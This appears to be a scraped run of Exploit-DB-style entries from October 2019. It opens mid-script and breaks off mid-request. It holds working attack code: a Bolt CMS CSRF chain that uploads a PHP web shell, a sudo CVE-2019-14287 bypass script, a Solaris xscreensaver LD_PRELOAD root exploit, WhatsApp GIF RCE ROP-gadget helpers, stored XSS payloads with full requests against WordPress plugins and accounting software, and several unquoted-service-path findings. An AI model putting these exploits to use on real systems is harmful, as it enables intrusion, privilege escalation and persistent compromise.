"http:\/\/127.0.0.1/index.php/async/folder/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; xhr.timeout = 4000; var body1 = "namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php"; xhr.send(body1); bypass2(); } bypass2 = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; xhr.timeout = 4000; var body1 = "namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1"; xhr.send(body1); } Token(); </script> version 6.5 CSrf p0c <html> <body> <head> Bolt v 3.x CVE-2019-17591 exploit </head> <h1>Bolt v 3.x csrf -> xss -> rce exploit</h1> <img src =" https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg"> <script> function submitRequest() { Csrf = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "filename=test&parentPath=&namespace=files"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ JSfuck(); } }; } JSfuck = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x' onerror=alert(1)>"; xhr.send(body1); } Csrf(); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> Js p0c <script> Token = async () => { var xhr = new XMLHttpRequest(); xhr.open("GET", "\/bolt\/files", true); xhr.responseType = "document"; xhr.withCredentials=true; xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ doc = xhr.response; token = doc.getElementsByName("file_upload[_token]")[0].value; upload(token); console.log(token); } } xhr.send(null); } upload = async (csrfToken) =>{ var body = "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" + "Content-Type: text/plain\r\n" + "\r\n" + "<?php system($_GET['test']);?>\r\n" + "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" + "\r\n" + token "-----------------------------190530466613268610451083392867--\r\n"; const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867"); xhr.withCredentials = true; xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ Shell(); } }; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } Shell = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body1 = "namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php"; xhr.send(body1); } Token(); </script> proof of concept : https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing Greetz to : Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red Virus,m7md1337,D3vil1337,and all my friends

# Exploit Title : sudo 1.8.27 - Security Bypass # Date : 2019-10-15 # Original Author: Joe Vennix # Exploit Author : Mohin Paramasivam (Shad0wQu35t) # Version : Sudo <1.8.28 # Tested on Linux # Credit : Joe Vennix from Apple Information Security found and analyzed the bug # Fix : The bug is fixed in sudo 1.8.28 # CVE : 2019-14287 '''Check for the user sudo permissions sudo -l User hacker may run the following commands on kali: (ALL, !root) /bin/bash So user hacker can't run /bin/bash as root (!root) User hacker sudo privilege in /etc/sudoers # User privilege specification root ALL=(ALL:ALL) ALL hacker ALL=(ALL,!root) /bin/bash With ALL specified, user hacker can run the binary /bin/bash as any user EXPLOIT: sudo -u#-1 /bin/bash Example : hacker@kali:~$ sudo -u#-1 /bin/bash root@kali:/home/hacker# id uid=0(root) gid=1000(hacker) groups=1000(hacker) root@kali:/home/hacker# Description : Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id and /bin/bash is executed with root permission Proof of Concept Code : How to use : python3 sudo_exploit.py ''' #!/usr/bin/python3 import os #Get current username username = input("Enter current username :") #check which binary the user can run with sudo os.system("sudo -l > priv") os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary") binary_file = open("binary") binary= binary_file.read() #execute sudo exploit print("Lets hope it works") os.system("sudo -u#-1 "+ binary)

# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Version : ActiveFax Server 6.92 Build 0316 # Tested on Windows 10 # CVE : N/A sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ActiveFax-Server-Dienst DEPENDENCIES : SERVICE_START_NAME : .\Administrator

# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path # Author: Luis MedinaL # Date: 2019-10-15 # Vendor Homepage: https://www.adaware.com/ # Software Link : https://www.adaware.com/antivirus # Version : 2.3.4.7 # Tested on: Microsoft Windows 10 Pro x64 ESP # Description: # Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path C:\Users\Luis ML>sc qc LavasoftTcpService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LavasoftTcpService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : LavasoftTcpService DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting # Exploit Author: Debashis Pal # Date: 2019-10-16 # Vendor Homepage: https://www.nchsoftware.com # Source: https://www.nchsoftware.com/accounting/index.html # Version: Express Accounts Accounting v7.02 # CVE : N/A # Tested on: Windows 7 SP1(32bit) # About Express Accounts Accounting v7.02 ========================================= Express Accounts is professional business accounting software, perfect for small businesses. # Vulnerability ================ Persistent Cross site scripting (XSS). # PoC ====== 1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e http://A.B.C.D:98 [Default installation]. 2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script> Save the change. or Under "Sales Orders" Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script> Save the change. or Under "Items" Items -> Add new item-> Item field: put </script><script>alert('XSS');</script> Save the change. or Under "Customers" Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script> Save the change. or Under "Quotes" Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script> Save the change. 3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute. # Disclosure Timeline ====================== Vulnerability Discover Date: 15-Sep-2019. Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. Submit exploit-db : 16-Oct-2019. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Zilab Software Inc # Version : Zilab Remote Console Server 3.2.9 # Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support # Tested on Windows 10 # CVE : N/A C:\Users\Administrator>sc qc zrcs [SC] QueryServiceConfig SUCCESS SERVICE_NAME: zrcs TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Zilab Remote Console Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow # Date: 2019-10-16 # Exploit Author: Marcelo Vázquez (aka s4vitar) # Vendor Homepage: https://www.x.org/ # Version: <= 1.20.4 # Tested on: Linux # CVE: CVE-2019-17624 #!/usr/bin/python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4vitar) * # * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) * # ************************************************************************ import sys, time import ctypes as ct from ctypes import cast from ctypes.util import find_library def access_violation(x11, current_display): keyboard = (ct.c_char * 1000)() x11.XQueryKeymap(current_display, keyboard) if __name__ == '__main__': print "\n[*] Loading x11...\n" time.sleep(2) x11 = ct.cdll.LoadLibrary(find_library("X11")) current_display = x11.XOpenDisplay(None) print "[*] Exploiting...\n" time.sleep(1) try: access_violation(x11, current_display) except: print "\nError...\n" sys.exit(1)

# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc romservice [SC] QueryServiceConfig SUCCESS SERVICE_NAME: romservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : LiteManagerTeam LiteManager DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation # Date: 2019-10-16 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/ # Version: Solaris 11.x # Tested on: Solaris 11.4 and 11.3 X86 # CVE: N/A #!/bin/sh # # raptor_xscreensaver - Solaris 11.x LPE via xscreensaver # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # Exploitation of a design error vulnerability in xscreensaver, as # distributed with Solaris 11.x, allows local attackers to create # (or append to) arbitrary files on the system, by abusing the -log # command line switch introduced in version 5.06. This flaw can be # leveraged to cause a denial of service condition or to escalate # privileges to root. This is a Solaris-specific vulnerability, # caused by the fact that Oracle maintains a slightly different # codebase from the upstream one (CVE-2019-3010). # # "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs # "Good hackers force luck." -- ~A. # # This exploit targets the /usr/lib/secure/ directory in order # to escalate privileges with the LD_PRELOAD technique. The # implementation of other exploitation vectors, including those # that do not require gcc to be present on the target system, is # left as an exercise to fellow UNIX hackers;) # # Usage: # raptor@stalker:~$ chmod +x raptor_xscreensaver # raptor@stalker:~$ ./raptor_xscreensaver # [...] # Oracle Corporation SunOS 5.11 11.4 Aug 2018 # root@stalker:~# id # uid=0(root) gid=0(root) # root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* # # Vulnerable platforms: # Oracle Solaris 11 X86 [tested on 11.4 and 11.3] # Oracle Solaris 11 SPARC [untested] # echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>" echo # prepare the payload echo "int getuid(){return 0;}" > /tmp/getuid.c gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc if [ $? -ne 0 ]; then echo "error: problem compiling the shared library, check your gcc" exit 1 fi # check the architecture LOG=/usr/lib/secure/getuid.so file /bin/su | grep 64-bit >/dev/null 2>&1 if [ $? -eq 0 ]; then LOG=/usr/lib/secure/64/getuid.so fi # start our own xserver # alternatively we can connect back to a valid xserver (e.g. xquartz) /usr/bin/Xorg :1 & # trigger the bug umask 0 /usr/bin/xscreensaver -display :1 -log $LOG & sleep 5 # clean up pkill -n xscreensaver pkill -n Xorg # LD_PRELOAD-fu cp /tmp/getuid.so $LOG LD_PRELOAD=$LOG su -

# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc Mikogo-Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Mikogo-Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Mikogo-Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution # Date: 2019-10-16 # Exploit Author: Valerio Brussani (@val_brux) # Vendor Homepage: https://www.whatsapp.com/ # Version: < 2.19.244 # Tested on: Whatsapp 2.19.216 # CVE: CVE-2019-11932 # Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ # Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp # Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/) /* * * Introduction * This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. * The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp * */ #include <jni.h> #include <string> #include <dlfcn.h> #include <link.h> typedef uint8_t byte; char *gadget_p; void* libc,* lib; //dls iteration for rop int dl_callback(struct dl_phdr_info *info, size_t size, void *data) { int j; const char *base = (const char *)info->dlpi_addr; for (j = 0; j < info->dlpi_phnum; j++) { const ElfW(Phdr) *phdr = &info->dlpi_phdr[j]; if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) { gadget_p = (char *) base + phdr->p_vaddr; return 1; } } return 0; } //system address void* get_system_address(){ libc = dlopen("libc.so",RTLD_GLOBAL); void* address = dlsym( libc, "system"); return address; } //rop gadget address void get_gadget_lib_base_address() { lib = dlopen("libhwui.so",RTLD_GLOBAL); dl_iterate_phdr(dl_callback, NULL); } //search gadget long search_for_gadget_offset() { char *buffer; long filelen; char curChar; long pos = 0; int curSearch = 0; //reading file FILE* fd = fopen("/system/lib64/libhwui.so","rb"); fseek(fd, 0, SEEK_END); filelen = ftell(fd); rewind(fd); buffer = (char *)malloc((filelen+1)*sizeof(char)); fread(buffer, filelen, 1, fd); fclose(fd); //searching for bytes byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6}; while(pos <= filelen){ curChar = buffer[pos];pos++; if(curChar == g1[curSearch]){ curSearch++; if(curSearch > 11){ curSearch = 0; pos-=12; break; } } else{ curSearch = 0; } } return pos; } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) { char buff[30]; //system address snprintf(buff, sizeof(buff), "%p", get_system_address()); dlclose(libc); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) { char buff[30]; get_gadget_lib_base_address(); //gadget address snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset()); dlclose(lib); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); }

# Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\foogallery" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://foo.gallery/ # Software Link: https://wordpress.org/plugins/foogallery/ # Version: 1.8.12 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag the vulnerability parameters are as follows. 1.Go to the 'add Gallery' of FooGallery 2.Enter the payload in the "add Title" 3.Click the "Publish" option 4.Go to plugin setting of FooGallery 5.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true # Parameter & Payoad: post_title="/><script>alert("Unk9vvn")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true Content-Type: application/x-www-form-urlencoded Content-Length: 2694 Cookie: ...... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=

# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\soliloquy-lite" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://soliloquywp.com/ # Software Link: https://wordpress.org/plugins/soliloquy-lite/ # Version: 2.5.6 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil. 1.Go to the 'Add new' section of soliloquy 2.Enter the payload in the "add Title" 3.Select a sample image 4.Click the "Publish" option 5.Click on Preview 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit # Parameter & Payoad: post_title=&#47;"><script>alert("Unk9vvN")<&#47;script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1599 Cookie: ....... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update

# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\popupbuilder" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://popup-builder.com/ # Software Link: https://wordpress.org/plugins/popup-builder/ # Version: 3.49 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title. 1.Go to the 'Add new' section of Popup Builder 2.Select Image type 3.Enter the payload in the "add Title" 4.Click the "Publish" option 5.Go to Add New of Page section or Add New of Post section 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true # Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 2425 Cookie: ...... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-clic